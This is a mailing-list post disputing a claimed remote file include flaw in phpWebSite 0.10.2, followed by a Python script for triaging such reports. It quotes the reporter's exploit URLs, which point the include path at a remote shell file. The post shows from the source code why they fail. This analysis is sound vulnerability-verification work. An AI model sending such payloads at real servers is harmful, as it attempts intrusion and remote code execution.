[VIM] phpWebSite 0.10.2 RFI - CVE dispute
Steven M. Christey
coley at mitre.org
Tue Oct 10 18:56:09 EDT 2006
Researcher: Crackers_Child (which is why I looked closer)

Reference: phpWebSite 0.10.2 Remote File Include Vulnerabilities
http://www.securityfocus.com/archive/1/archive/1/448098/100/0/threaded

I downloaded the same software version, as specified in the URL
provided by Crackers_Child, and took a look.

Example exploits:

> mod/users/init.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?

If we look at init.php, we see:

  require(PHPWS_SOURCE_DIR."mod/users/class/Cookie.php");
  require(PHPWS_SOURCE_DIR."mod/users/class/ModSetting.php");
  require(PHPWS_SOURCE_DIR."mod/users/class/Forms.php");
  require(PHPWS_SOURCE_DIR."mod/users/class/Groups.php");

and nothing else.

So, we have a PHP constant. Can't be controlled, right?

> mod/users/class/users.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?

Actually it's spelled "Users.php"

Anyway, we have things like this:

  require_once(PHPWS_SOURCE_DIR . 'core/Error.php');

for users/class/Cookie.php:

  require_once(PHPWS_SOURCE_DIR.'core/Form.php');

going to core/EZform.php:

  require_once PHPWS_SOURCE_DIR . "core/EZelement.php";

A grep for PHPWS_SOURCE_DIR returns 799 matches, almost all of which
are of the forms above, and one or two define's of the constant.

There is no evidence of any use of $_GET, $PHPWS_SOURCE_DIR, etc.

- Steve
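
The grep-and-classify check described in the message can be scripted for triaging similar remote file include reports. This is an added example, not part of the original post or of phpWebSite; the require lines in SAMPLE are the ones quoted above, while the define() path, the file layout and the contrast.php line are assumptions constructed for illustration.

```python
import re

# Constructed sample: the require lines are the ones quoted in the post;
# the define() path and the CONTRAST file are assumptions for illustration.
SAMPLE = {
    "conf/config.php": "<?php\ndefine('PHPWS_SOURCE_DIR', '/srv/phpwebsite/');\n",
    "mod/users/init.php": """<?php
require(PHPWS_SOURCE_DIR."mod/users/class/Cookie.php");
require(PHPWS_SOURCE_DIR."mod/users/class/ModSetting.php");
require(PHPWS_SOURCE_DIR."mod/users/class/Forms.php");
require(PHPWS_SOURCE_DIR."mod/users/class/Groups.php");
""",
    "core/EZform.php": '<?php\nrequire_once PHPWS_SOURCE_DIR . "core/EZelement.php";\n',
}
CONTRAST = {"contrast.php": "<?php\nrequire_once($PHPWS_SOURCE_DIR . 'core/Error.php');\n"}

INCLUDE_RE = re.compile(r"\b(?:require|include)(?:_once)?\s*\(?\s*(.+?)\s*\)?\s*;")
DEFINE_RE = re.compile(r"""\bdefine\s*\(\s*['"](\w+)['"]""")
REQUEST_RE = re.compile(r"\$(?:_GET|_POST|_REQUEST|_COOKIE|HTTP_\w+_VARS)\b")

def classify(expr, name):
    """Say how `name` appears in an include path expression."""
    if REQUEST_RE.search(expr):
        return "request"    # path built directly from request data
    if re.search(r"\$" + re.escape(name) + r"\b", expr):
        return "variable"   # a variable of that name: needs data-flow review
    if re.search(r"(?<![$\w])" + re.escape(name) + r"\b", expr):
        return "constant"   # bare identifier: a constant, not settable from request parameters
    return "other"

def triage(files, name):
    """files maps path -> PHP source; returns counts plus lines to review."""
    report = {"constant": 0, "variable": 0, "request": 0, "other": 0,
              "defines": [], "flagged": []}
    for path, src in files.items():
        for lineno, line in enumerate(src.splitlines(), 1):
            report["defines"] += [(path, lineno) for m in DEFINE_RE.finditer(line)
                                  if m.group(1) == name]
            m = INCLUDE_RE.search(line)
            if m:
                kind = classify(m.group(1), name)
                report[kind] += 1
                if kind in ("variable", "request"):
                    report["flagged"].append((path, lineno, m.group(1)))
    return report

if __name__ == "__main__":
    print(triage(SAMPLE, "PHPWS_SOURCE_DIR"))
    print(triage(CONTRAST, "PHPWS_SOURCE_DIR"))
```

An empty "flagged" list together with at least one "defines" entry matches the finding in the message; any "variable" or "request" hit is a line to review by hand.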